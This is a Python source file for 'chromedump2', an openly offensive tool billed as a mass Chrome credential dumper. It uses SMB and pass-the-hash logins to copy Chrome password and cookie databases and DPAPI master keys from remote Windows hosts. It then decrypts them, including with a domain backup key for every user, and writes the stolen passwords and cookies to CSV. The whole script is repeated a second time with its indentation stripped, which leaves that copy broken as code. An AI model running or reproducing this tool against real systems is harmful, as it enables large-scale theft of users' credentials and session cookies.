3xocyte/chromedump2.py

## chromedump2.py
#!/usr/bin/env python3

# by Matt Bush (@3xocyte)

import os
import sys
import logging
import argparse
import traceback
import time
import sqlite3
import binascii

import csv
import datetime

from Cryptodome.Cipher import AES, PKCS1_v1_5
from Cryptodome.Hash import HMAC, SHA1, MD4
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SMBConnection
from impacket.uuid import bin_to_string
from hashlib import pbkdf2_hmac
from impacket.dpapi import MasterKeyFile, MasterKey, DomainKey, DPAPI_BLOB, PRIVATE_KEY_BLOB, DPAPI_DOMAIN_RSA_MASTER_KEY, PVK_FILE_HDR, privatekeyblob_to_pkcs1

logger.init()

# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
def derive_keys(sid, password, is_hash = False, sha1 = None):
    # Will generate two keys, one with SHA1 and another with MD4
    logging.debug("deriving keys")
    if is_hash == True:
        if sha1 is not None:
            key1 = HMAC.new(binascii.unhexlify(sha1), (sid + '\0').encode('utf-16le'), SHA1).digest()
            logging.debug("deriving key from sha1 key: %s" % sha1)
            logging.debug("key1 derived from sha1 key: %s" % binascii.hexlify(key1))
        else:
            logging.debug("no SHA1 key provided")
            key1 = b''
        key2 = HMAC.new(binascii.unhexlify(password), (sid + '\0').encode('utf-16le'), SHA1).digest()
        logging.debug("key2: %s" % binascii.hexlify(key2))
        tmpKey = pbkdf2_hmac('sha256', binascii.unhexlify(password), sid.encode('utf-16le'), 10000)
        tmpKey2 = pbkdf2_hmac('sha256', tmpKey, sid.encode('utf-16le'), 1)[:16]
    else:
        key1 = HMAC.new(SHA1.new(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), SHA1).digest()
        logging.debug("key1: %s" % binascii.hexlify(key1))
        key2 = HMAC.new(MD4.new(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), SHA1).digest()
        logging.debug("key2: %s" % binascii.hexlify(key2))
#        logging.debug("key1 derived from sha1 key: %s" % binascii.hexlify(key1))
    # For Protected users
        tmpKey = pbkdf2_hmac('sha256', MD4.new(password.encode('utf-16le')).digest(), sid.encode('utf-16le'), 10000)
        tmpKey2 = pbkdf2_hmac('sha256', tmpKey, sid.encode('utf-16le'), 1)[:16]
    key3 = HMAC.new(tmpKey2, (sid + '\0').encode('utf-16le'), SHA1).digest()[:20]
    logging.debug("key3: %s" % binascii.hexlify(key3))
    return key1, key2, key3

# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
def decrypt_masterkey(sid, password, masterkeyfile, is_hash = False, sha1 = None):
    dpapiSystem = {}
    fp = open(masterkeyfile, 'rb')
    data = fp.read()
    mkf= MasterKeyFile(data)
    data = data[len(mkf):]
    fp.close()
    if mkf['MasterKeyLen'] > 0:
        mk = MasterKey(data[:mkf['MasterKeyLen']])
        data = data[len(mk):]
    key1, key2, key3 = derive_keys(sid, password, is_hash = is_hash, sha1 = sha1)
    decryptedKey = mk.decrypt(key3)
    if decryptedKey:
        logging.debug("using key3")
        return decryptedKey

    decryptedKey = mk.decrypt(key2)
    if decryptedKey:
        logging.debug("using key2")
        return decryptedKey

    decryptedKey = mk.decrypt(key1)
    if decryptedKey:
        logging.debug("using key1")
        return decryptedKey
    logging.error("unable to decrypt masterkey")

# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
def decrypt_with_domainkey(domainkeyfile, masterkey, user):
    fp = open(masterkey, 'rb')
    data = fp.read()
    mkf= MasterKeyFile(data)
    data = data[len(mkf):]

    if mkf['MasterKeyLen'] > 0:
        mk = MasterKey(data[:mkf['MasterKeyLen']])
        data = data[len(mk):]
    if mkf['BackupKeyLen'] > 0:
        bkmk = MasterKey(data[:mkf['BackupKeyLen']])
        data = data[len(bkmk):]
    if mkf['CredHistLen'] > 0:
        ch = CredHist(data[:mkf['CredHistLen']])
        data = data[len(ch):]
    if mkf['DomainKeyLen'] > 0:
        dk = DomainKey(data[:mkf['DomainKeyLen']])
        data = data[len(dk):]

    pvkfile = open(domainkeyfile, 'rb').read()
    key = PRIVATE_KEY_BLOB(pvkfile[len(PVK_FILE_HDR()):])
    private = privatekeyblob_to_pkcs1(key)
    cipher = PKCS1_v1_5.new(private)

    decryptedKey = cipher.decrypt(dk['SecretData'][::-1], None)
    if decryptedKey:
        domain_master_key = DPAPI_DOMAIN_RSA_MASTER_KEY(decryptedKey)
        key = domain_master_key['buffer'][:domain_master_key['cbMasterKey']]
        logging.debug('decrypted key for user %s: 0x%s' % (user, binascii.hexlify(key).decode('latin-1')))

    fp.close()
    return key

def get_login_data_file(share, smb_client, username):
    login_data_location = "users\\" + username + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
    db_filename = username + "_logins.bin"
    fh = open(db_filename,'wb')
    try:
        smb_client.getFile(share, login_data_location, fh.write, 0x03) # SMB_ACCESS_EXEC bypasses the read lock if Chrome is open
        logging.debug("got Chrome Login Data file (%s)" % db_filename)
        fh.close()
        return db_filename
    except:
        fh.close()
        os.remove(db_filename)
        logging.debug("didn't get %s" % login_data_location)
        return None

def get_cookie_file(share, smb_client, username):
    cookie_data_location = "users\\" + username + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
    db_filename = username + "_cookies.bin"
    fh = open(db_filename,'wb')
    try:
        smb_client.getFile(share, cookie_data_location, fh.write, 0x03) # SMB_ACCESS_EXEC bypasses the read lock if Chrome is open
        logging.debug("got Chrome Cookies file (%s)" % db_filename)
        fh.close()
        return db_filename
    except:
        fh.close()
        os.remove(db_filename)
        logging.debug("didn't get %s" % login_data_location)
        return None

def get_user_sid(smb_client, share, username):
    sid_dir_location = "users\\" + username + "\\AppData\\Roaming\\Microsoft\\Protect\\*"
    user_sid = ''
    try:
        for f in smb_client.listPath(share, sid_dir_location):
            fname = f.get_longname()
            if "S-" in fname:
                user_sid = fname
                logging.debug("found user sid: %s" % user_sid)
                break
        if user_sid == '':
            logging.debug("failed to find user sid")
            return ''
        else:
            logging.debug("got sid for user %s: %s" % (username, user_sid))
            return user_sid
    except Exception as e:
        logging.debug("couldn't get user sid: %s" % e)
        return ''

def get_masterkey_file(share, smb_client, username, guid, user_sid):
    masterkeyfile_location = "users\\" + username + "\\AppData\\Roaming\\Microsoft\\Protect\\" + user_sid + "\\" + guid
    logging.debug("master key file location: %s" % masterkeyfile_location)
    fh = open(guid,'wb')
    try:
        smb_client.getFile(share, masterkeyfile_location, fh.write)
        logging.debug("got master key file %s" % guid)
        fh.close()
        return True
    except:
        fh.close()
        os.remove(guid)
        logging.debug("didn't get %s" % masterkeyfile_location)
        return False

def get_masterkeyfile_guid(database_filename):
    try:
        conn = sqlite3.connect(database_filename)
        cursor = conn.cursor()
        cursor.execute('SELECT password_value FROM logins')
        data = cursor.fetchall()
        password_blob = data[0][0]
        blob = DPAPI_BLOB(password_blob)
        conn.close()
        return bin_to_string(blob["GuidMasterKey"])
    except:
        return None

def read_creds(database_filename, key, user, target):
    conn = sqlite3.connect(database_filename)
    cursor = conn.cursor()
    creds_fields = ['origin_url', 'action_url', 'username_element', 'username_value', 'password_element', 'password_value', 'date_created' ]
    cursor.execute("SELECT %s FROM logins" % ",".join(creds_fields))
    data = cursor.fetchall()
    if len(data) > 0:
        creds_output_filename = target + "_" + user + "_creds.csv"
        with open(creds_output_filename, 'w', newline='') as csvfile:
            writer = csv.writer(csvfile)
            writer.writerow(creds_fields)
            for result in data:
                result = list(result)
                url = result[1]
                username = result[3]
                password_blob = result[5]
                blob = DPAPI_BLOB(password_blob)
                decrypted = blob.decrypt(key)
                # "in-place"
                result[5] = decrypted
                print("[%s] %s\t%s\t%s\t%s" % (target, user, url, username, decrypted))
                result[6] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[6])
                writer.writerow(result)
    conn.close()

def read_cookies(database_filename, key, user, target):
    conn = sqlite3.connect(database_filename)
    cursor = conn.cursor()
    cookie_fields = ['creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc', 'last_access_utc', 'has_expires', 'priority', 'encrypted_value']
    cursor.execute("SELECT %s FROM cookies" % ",".join(cookie_fields))
    data = cursor.fetchall()
    if len(data) > 0:
        logging.debug("found %s cookies" % len(data))
        cookie_output_filename = target + "_" + user + "_cookies.csv"
        with open(cookie_output_filename, 'w', newline='') as csvfile:
            writer = csv.writer(csvfile)
            # convert tuples to list for "in-place" changes
            header = list(cookie_fields)
            header[9] = 'decrypted_value'
            writer.writerow(header)
            for result in data:
                result = list(result)
                value_blob = result[9]
                blob = DPAPI_BLOB(value_blob)
                decrypted = blob.decrypt(key)
                result[9] = decrypted
                # Convert timestamps
                result[0] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[0])
                result[5] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[5])
                result[6] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[6])
                writer.writerow(result)
    conn.close()

def main():

    parser = argparse.ArgumentParser(add_help = True, description = "Mass Chrome credential dumping tool by @3xocyte")
    parser.add_argument('-u', '--username', action="store", default='', help='valid username')
    parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
    password_group = parser.add_mutually_exclusive_group()
    password_group.add_argument('--nt', action="store", default='', help='user nt hash (instead of password)')
    password_group.add_argument('-p', '--password', action="store", default='', help='valid password')
    parser.add_argument('--sha1', action="store", default=None, help='user sha1 hash (optional, to use with PtH)')
    parser.add_argument('--domain-key', help='domain backup private key file') #use dpapi.py or Mimikatz with correct FQDN specified to retrieve it
    parser.add_argument('--target-file', action="store_true", default=False, help='target is a file full of targets')
    parser.add_argument('--cookies', action="store_true", default=False, help='dump cookies to target_username_cookies.csv')
    parser.add_argument('--debug', action="store_true", help='debug mode')
    parser.add_argument('target', help='ip address or hostname of target (if --file is specified, a file containing one hostname/IP address per line)')

    if len(sys.argv) == 1:
        parser.print_help()
        print("\nexamples: ")
        print("\n\tdump creds and cookies for a given user from a single target")
        print("\t./chromedump2.py -d <domain> -u <username> -p '<password>' --cookies 192.168.1.12")
        print("\n\tdump creds and cookies for a given user from a single target using an NT hash and a SHA1 key")
        print("\t./chromedump2.py -d <domain> -u <username> --nt <nt hash> --sha1 <sha1 key> --cookies 192.168.1.12")
        print("\n\tdump creds and cookies from a list of targets using the domain backup key")
        print("\t./chromedump2.py -d <domain> -u administrator -p '<password>' --domain-key 'backup.pvk' --target-file --cookies target_list\n")
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)

    domain = options.domain
    username = options.username
    password = options.password
    pvk = options.domain_key
    target_file = options.target_file
    cookies = options.cookies
    targets = []

    if options.nt:
        nthash = options.nt
        lmhash = '0'
        is_hash = True
        logging.info("using hash to login")
    else:
        nthash = ''
        lmhash = ''
        is_hash = False

    if options.sha1:
        sha1 = options.sha1
    else:
        sha1 = None

    if password == '' and nthash == '' and lmhash == '':
        from getpass import getpass
        password = getpass("password:")

    # are we hitting a single target or a file of targets?
    if target_file:
        tf = open(options.target, "r")
        target_list = tf.readlines()
        tf.close
        targets = list(map(str.strip,target_list))
    else:
        targets = [options.target]

    if pvk:
        logging.info("domain backup key provided, dumping Login Data for all users on %s target(s)" % len(targets))

    for target in targets:
        # do smb login
        try:
            smb_client = SMBConnection(target, target)
            smb_client.login(username, password, domain, lmhash, nthash)
            share = "C$"
            smb_client.connectTree(share)
            logging.info("connected to %s using provided credentials" % share)
        except Exception as e:
            logging.error("failed to connect to %s" % target)
            logging.error(e)
            continue

        # getting all users from a machine
        if pvk:
            users = []
            # first list everything in c:\users, for our users
            users_dir = "users\\*"
            for u in smb_client.listPath(share, users_dir):
                uname = u.get_longname()
                if uname == "." or uname == "..":
                    pass
                else:
                    if u.is_directory():
                        users.append(uname)
            logging.info("found %s users on %s, dumping available creds..." % (len(users), target))
            data_files = {}
            for u in users:
                logging.debug("getting database for %s" % u)
                # get the chrome database, at a fixed location
                data_filename = get_login_data_file(share, smb_client, u)
                if data_filename:
                    data_files[u] = data_filename

            logging.debug("got %d users' Login Data files" % len(data_files))

            # get the user's SID from their AppData directory
            for user, value in data_files.items():
                user_sid = get_user_sid(smb_client, share, user)
                user_guid = get_masterkeyfile_guid(value)
                if user_guid:
                    logging.debug("user %s master key file is %s" % (user, user_guid))
                    # get the user's SID from their AppData directory, used for the master key file path and to decrypt the key
                    if get_masterkey_file(share, smb_client, user, user_guid, user_sid):
                        key = decrypt_with_domainkey(pvk, user_guid, user)
                        read_creds(value, key, user, target)
                        # cookies...
                        if cookies:
                            cookie_filename = get_cookie_file(share, smb_client, user)
                            if cookie_filename:
                                read_cookies(cookie_filename, key, user, target)
                else:
                    logging.debug("failed to get guid")

            smb_client.close()

        # get one user's creds
        else:
            logging.info("getting Chrome Login Data for %s from %s" % (username, target))
            # first get the chrome database
            try:
                data_filename = get_login_data_file(share, smb_client, username)
                if data_filename:
                    logging.debug("got %s's Chrome Login Data file (%s)" % (username, data_filename))
                    # get the user's SID from their AppData directory, used for the master key file path and to decrypt the key
                    sid = get_user_sid(smb_client, share, username)
                    user_guid = get_masterkeyfile_guid(data_filename)
                    if user_guid:
                        logging.debug("user %s master key file is %s" % (username, user_guid))
                        if get_masterkey_file(share, smb_client, username, user_guid, sid):
                            if is_hash == True:
                                password = nthash
                                logging.debug("set 'password' to %s" % password)
                            key = decrypt_masterkey(sid, password, user_guid, is_hash = is_hash, sha1 = sha1)
                            if key is not None:
                                logging.debug('decrypted key for user %s: 0x%s' % (username, binascii.hexlify(key).decode('latin-1')))
                                read_creds(data_filename, key, username, target)
                                # cookies...
                                if cookies:
                                    cookie_filename = get_cookie_file(share, smb_client, username)
                                    if cookie_filename:
                                        read_cookies(cookie_filename, key, username, target)
                            else:
                                logging.info("failed to decrypt master key")
                else:
                    logging.error("couldn't extract master key file GUID from the Login Data DB")

            except Exception as e:
                logging.error("general failure: %s" % e)
            smb_client.close()

if __name__ == "__main__":
    main()
	#!/usr/bin/env python3

	# by Matt Bush (@3xocyte)

	import os
	import sys
	import logging
	import argparse
	import traceback
	import time
	import sqlite3
	import binascii

	import csv
	import datetime

	from Cryptodome.Cipher import AES, PKCS1_v1_5
	from Cryptodome.Hash import HMAC, SHA1, MD4
	from impacket.examples import logger
	from impacket import version
	from impacket.smbconnection import SMBConnection
	from impacket.uuid import bin_to_string
	from hashlib import pbkdf2_hmac
	from impacket.dpapi import MasterKeyFile, MasterKey, DomainKey, DPAPI_BLOB, PRIVATE_KEY_BLOB, DPAPI_DOMAIN_RSA_MASTER_KEY, PVK_FILE_HDR, privatekeyblob_to_pkcs1

	logger.init()

	# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
	def derive_keys(sid, password, is_hash = False, sha1 = None):
	# Will generate two keys, one with SHA1 and another with MD4
	logging.debug("deriving keys")
	if is_hash == True:
	if sha1 is not None:
	key1 = HMAC.new(binascii.unhexlify(sha1), (sid + '\0').encode('utf-16le'), SHA1).digest()
	logging.debug("deriving key from sha1 key: %s" % sha1)
	logging.debug("key1 derived from sha1 key: %s" % binascii.hexlify(key1))
	else:
	logging.debug("no SHA1 key provided")
	key1 = b''
	key2 = HMAC.new(binascii.unhexlify(password), (sid + '\0').encode('utf-16le'), SHA1).digest()
	logging.debug("key2: %s" % binascii.hexlify(key2))
	tmpKey = pbkdf2_hmac('sha256', binascii.unhexlify(password), sid.encode('utf-16le'), 10000)
	tmpKey2 = pbkdf2_hmac('sha256', tmpKey, sid.encode('utf-16le'), 1)[:16]
	else:
	key1 = HMAC.new(SHA1.new(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), SHA1).digest()
	logging.debug("key1: %s" % binascii.hexlify(key1))
	key2 = HMAC.new(MD4.new(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), SHA1).digest()
	logging.debug("key2: %s" % binascii.hexlify(key2))
	# logging.debug("key1 derived from sha1 key: %s" % binascii.hexlify(key1))
	# For Protected users
	tmpKey = pbkdf2_hmac('sha256', MD4.new(password.encode('utf-16le')).digest(), sid.encode('utf-16le'), 10000)
	tmpKey2 = pbkdf2_hmac('sha256', tmpKey, sid.encode('utf-16le'), 1)[:16]
	key3 = HMAC.new(tmpKey2, (sid + '\0').encode('utf-16le'), SHA1).digest()[:20]
	logging.debug("key3: %s" % binascii.hexlify(key3))
	return key1, key2, key3

	# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
	def decrypt_masterkey(sid, password, masterkeyfile, is_hash = False, sha1 = None):
	dpapiSystem = {}
	fp = open(masterkeyfile, 'rb')
	data = fp.read()
	mkf= MasterKeyFile(data)
	data = data[len(mkf):]
	fp.close()
	if mkf['MasterKeyLen'] > 0:
	mk = MasterKey(data[:mkf['MasterKeyLen']])
	data = data[len(mk):]
	key1, key2, key3 = derive_keys(sid, password, is_hash = is_hash, sha1 = sha1)
	decryptedKey = mk.decrypt(key3)
	if decryptedKey:
	logging.debug("using key3")
	return decryptedKey

	decryptedKey = mk.decrypt(key2)
	if decryptedKey:
	logging.debug("using key2")
	return decryptedKey

	decryptedKey = mk.decrypt(key1)
	if decryptedKey:
	logging.debug("using key1")
	return decryptedKey
	logging.error("unable to decrypt masterkey")

	# https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
	def decrypt_with_domainkey(domainkeyfile, masterkey, user):
	fp = open(masterkey, 'rb')
	data = fp.read()
	mkf= MasterKeyFile(data)
	data = data[len(mkf):]

	if mkf['MasterKeyLen'] > 0:
	mk = MasterKey(data[:mkf['MasterKeyLen']])
	data = data[len(mk):]
	if mkf['BackupKeyLen'] > 0:
	bkmk = MasterKey(data[:mkf['BackupKeyLen']])
	data = data[len(bkmk):]
	if mkf['CredHistLen'] > 0:
	ch = CredHist(data[:mkf['CredHistLen']])
	data = data[len(ch):]
	if mkf['DomainKeyLen'] > 0:
	dk = DomainKey(data[:mkf['DomainKeyLen']])
	data = data[len(dk):]

	pvkfile = open(domainkeyfile, 'rb').read()
	key = PRIVATE_KEY_BLOB(pvkfile[len(PVK_FILE_HDR()):])
	private = privatekeyblob_to_pkcs1(key)
	cipher = PKCS1_v1_5.new(private)

	decryptedKey = cipher.decrypt(dk['SecretData'][::-1], None)
	if decryptedKey:
	domain_master_key = DPAPI_DOMAIN_RSA_MASTER_KEY(decryptedKey)
	key = domain_master_key['buffer'][:domain_master_key['cbMasterKey']]
	logging.debug('decrypted key for user %s: 0x%s' % (user, binascii.hexlify(key).decode('latin-1')))

	fp.close()
	return key

	def get_login_data_file(share, smb_client, username):
	login_data_location = "users\\" + username + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
	db_filename = username + "_logins.bin"
	fh = open(db_filename,'wb')
	try:
	smb_client.getFile(share, login_data_location, fh.write, 0x03) # SMB_ACCESS_EXEC bypasses the read lock if Chrome is open
	logging.debug("got Chrome Login Data file (%s)" % db_filename)
	fh.close()
	return db_filename
	except:
	fh.close()
	os.remove(db_filename)
	logging.debug("didn't get %s" % login_data_location)
	return None

	def get_cookie_file(share, smb_client, username):
	cookie_data_location = "users\\" + username + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
	db_filename = username + "_cookies.bin"
	fh = open(db_filename,'wb')
	try:
	smb_client.getFile(share, cookie_data_location, fh.write, 0x03) # SMB_ACCESS_EXEC bypasses the read lock if Chrome is open
	logging.debug("got Chrome Cookies file (%s)" % db_filename)
	fh.close()
	return db_filename
	except:
	fh.close()
	os.remove(db_filename)
	logging.debug("didn't get %s" % login_data_location)
	return None

	def get_user_sid(smb_client, share, username):
	sid_dir_location = "users\\" + username + "\\AppData\\Roaming\\Microsoft\\Protect\\*"
	user_sid = ''
	try:
	for f in smb_client.listPath(share, sid_dir_location):
	fname = f.get_longname()
	if "S-" in fname:
	user_sid = fname
	logging.debug("found user sid: %s" % user_sid)
	break
	if user_sid == '':
	logging.debug("failed to find user sid")
	return ''
	else:
	logging.debug("got sid for user %s: %s" % (username, user_sid))
	return user_sid
	except Exception as e:
	logging.debug("couldn't get user sid: %s" % e)
	return ''

	def get_masterkey_file(share, smb_client, username, guid, user_sid):
	masterkeyfile_location = "users\\" + username + "\\AppData\\Roaming\\Microsoft\\Protect\\" + user_sid + "\\" + guid
	logging.debug("master key file location: %s" % masterkeyfile_location)
	fh = open(guid,'wb')
	try:
	smb_client.getFile(share, masterkeyfile_location, fh.write)
	logging.debug("got master key file %s" % guid)
	fh.close()
	return True
	except:
	fh.close()
	os.remove(guid)
	logging.debug("didn't get %s" % masterkeyfile_location)
	return False

	def get_masterkeyfile_guid(database_filename):
	try:
	conn = sqlite3.connect(database_filename)
	cursor = conn.cursor()
	cursor.execute('SELECT password_value FROM logins')
	data = cursor.fetchall()
	password_blob = data[0][0]
	blob = DPAPI_BLOB(password_blob)
	conn.close()
	return bin_to_string(blob["GuidMasterKey"])
	except:
	return None

	def read_creds(database_filename, key, user, target):
	conn = sqlite3.connect(database_filename)
	cursor = conn.cursor()
	creds_fields = ['origin_url', 'action_url', 'username_element', 'username_value', 'password_element', 'password_value', 'date_created' ]
	cursor.execute("SELECT %s FROM logins" % ",".join(creds_fields))
	data = cursor.fetchall()
	if len(data) > 0:
	creds_output_filename = target + "_" + user + "_creds.csv"
	with open(creds_output_filename, 'w', newline='') as csvfile:
	writer = csv.writer(csvfile)
	writer.writerow(creds_fields)
	for result in data:
	result = list(result)
	url = result[1]
	username = result[3]
	password_blob = result[5]
	blob = DPAPI_BLOB(password_blob)
	decrypted = blob.decrypt(key)
	# "in-place"
	result[5] = decrypted
	print("[%s] %s\t%s\t%s\t%s" % (target, user, url, username, decrypted))
	result[6] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[6])
	writer.writerow(result)
	conn.close()

	def read_cookies(database_filename, key, user, target):
	conn = sqlite3.connect(database_filename)
	cursor = conn.cursor()
	cookie_fields = ['creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc', 'last_access_utc', 'has_expires', 'priority', 'encrypted_value']
	cursor.execute("SELECT %s FROM cookies" % ",".join(cookie_fields))
	data = cursor.fetchall()
	if len(data) > 0:
	logging.debug("found %s cookies" % len(data))
	cookie_output_filename = target + "_" + user + "_cookies.csv"
	with open(cookie_output_filename, 'w', newline='') as csvfile:
	writer = csv.writer(csvfile)
	# convert tuples to list for "in-place" changes
	header = list(cookie_fields)
	header[9] = 'decrypted_value'
	writer.writerow(header)
	for result in data:
	result = list(result)
	value_blob = result[9]
	blob = DPAPI_BLOB(value_blob)
	decrypted = blob.decrypt(key)
	result[9] = decrypted
	# Convert timestamps
	result[0] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[0])
	result[5] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[5])
	result[6] = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=result[6])
	writer.writerow(result)
	conn.close()

	def main():

	parser = argparse.ArgumentParser(add_help = True, description = "Mass Chrome credential dumping tool by @3xocyte")
	parser.add_argument('-u', '--username', action="store", default='', help='valid username')
	parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
	password_group = parser.add_mutually_exclusive_group()
	password_group.add_argument('--nt', action="store", default='', help='user nt hash (instead of password)')
	password_group.add_argument('-p', '--password', action="store", default='', help='valid password')
	parser.add_argument('--sha1', action="store", default=None, help='user sha1 hash (optional, to use with PtH)')
	parser.add_argument('--domain-key', help='domain backup private key file') #use dpapi.py or Mimikatz with correct FQDN specified to retrieve it
	parser.add_argument('--target-file', action="store_true", default=False, help='target is a file full of targets')
	parser.add_argument('--cookies', action="store_true", default=False, help='dump cookies to target_username_cookies.csv')
	parser.add_argument('--debug', action="store_true", help='debug mode')
	parser.add_argument('target', help='ip address or hostname of target (if --file is specified, a file containing one hostname/IP address per line)')

	if len(sys.argv) == 1:
	parser.print_help()
	print("\nexamples: ")
	print("\n\tdump creds and cookies for a given user from a single target")
	print("\t./chromedump2.py -d <domain> -u <username> -p '<password>' --cookies 192.168.1.12")
	print("\n\tdump creds and cookies for a given user from a single target using an NT hash and a SHA1 key")
	print("\t./chromedump2.py -d <domain> -u <username> --nt <nt hash> --sha1 <sha1 key> --cookies 192.168.1.12")
	print("\n\tdump creds and cookies from a list of targets using the domain backup key")
	print("\t./chromedump2.py -d <domain> -u administrator -p '<password>' --domain-key 'backup.pvk' --target-file --cookies target_list\n")
	sys.exit(1)

	options = parser.parse_args()

	if options.debug is True:
	logging.getLogger().setLevel(logging.DEBUG)
	else:
	logging.getLogger().setLevel(logging.INFO)

	domain = options.domain
	username = options.username
	password = options.password
	pvk = options.domain_key
	target_file = options.target_file
	cookies = options.cookies
	targets = []

	if options.nt:
	nthash = options.nt
	lmhash = '0'
	is_hash = True
	logging.info("using hash to login")
	else:
	nthash = ''
	lmhash = ''
	is_hash = False

	if options.sha1:
	sha1 = options.sha1
	else:
	sha1 = None

	if password == '' and nthash == '' and lmhash == '':
	from getpass import getpass
	password = getpass("password:")

	# are we hitting a single target or a file of targets?
	if target_file:
	tf = open(options.target, "r")
	target_list = tf.readlines()
	tf.close
	targets = list(map(str.strip,target_list))
	else:
	targets = [options.target]

	if pvk:
	logging.info("domain backup key provided, dumping Login Data for all users on %s target(s)" % len(targets))

	for target in targets:
	# do smb login
	try:
	smb_client = SMBConnection(target, target)
	smb_client.login(username, password, domain, lmhash, nthash)
	share = "C$"
	smb_client.connectTree(share)
	logging.info("connected to %s using provided credentials" % share)
	except Exception as e:
	logging.error("failed to connect to %s" % target)
	logging.error(e)
	continue

	# getting all users from a machine
	if pvk:
	users = []
	# first list everything in c:\users, for our users
	users_dir = "users\\*"
	for u in smb_client.listPath(share, users_dir):
	uname = u.get_longname()
	if uname == "." or uname == "..":
	pass
	else:
	if u.is_directory():
	users.append(uname)
	logging.info("found %s users on %s, dumping available creds..." % (len(users), target))
	data_files = {}
	for u in users:
	logging.debug("getting database for %s" % u)
	# get the chrome database, at a fixed location
	data_filename = get_login_data_file(share, smb_client, u)
	if data_filename:
	data_files[u] = data_filename

	logging.debug("got %d users' Login Data files" % len(data_files))

	# get the user's SID from their AppData directory
	for user, value in data_files.items():
	user_sid = get_user_sid(smb_client, share, user)
	user_guid = get_masterkeyfile_guid(value)
	if user_guid:
	logging.debug("user %s master key file is %s" % (user, user_guid))
	# get the user's SID from their AppData directory, used for the master key file path and to decrypt the key
	if get_masterkey_file(share, smb_client, user, user_guid, user_sid):
	key = decrypt_with_domainkey(pvk, user_guid, user)
	read_creds(value, key, user, target)
	# cookies...
	if cookies:
	cookie_filename = get_cookie_file(share, smb_client, user)
	if cookie_filename:
	read_cookies(cookie_filename, key, user, target)
	else:
	logging.debug("failed to get guid")

	smb_client.close()

	# get one user's creds
	else:
	logging.info("getting Chrome Login Data for %s from %s" % (username, target))
	# first get the chrome database
	try:
	data_filename = get_login_data_file(share, smb_client, username)
	if data_filename:
	logging.debug("got %s's Chrome Login Data file (%s)" % (username, data_filename))
	# get the user's SID from their AppData directory, used for the master key file path and to decrypt the key
	sid = get_user_sid(smb_client, share, username)
	user_guid = get_masterkeyfile_guid(data_filename)
	if user_guid:
	logging.debug("user %s master key file is %s" % (username, user_guid))
	if get_masterkey_file(share, smb_client, username, user_guid, sid):
	if is_hash == True:
	password = nthash
	logging.debug("set 'password' to %s" % password)
	key = decrypt_masterkey(sid, password, user_guid, is_hash = is_hash, sha1 = sha1)
	if key is not None:
	logging.debug('decrypted key for user %s: 0x%s' % (username, binascii.hexlify(key).decode('latin-1')))
	read_creds(data_filename, key, username, target)
	# cookies...
	if cookies:
	cookie_filename = get_cookie_file(share, smb_client, username)
	if cookie_filename:
	read_cookies(cookie_filename, key, username, target)
	else:
	logging.info("failed to decrypt master key")
	else:
	logging.error("couldn't extract master key file GUID from the Login Data DB")

	except Exception as e:
	logging.error("general failure: %s" % e)
	smb_client.close()

	if __name__ == "__main__":
	main()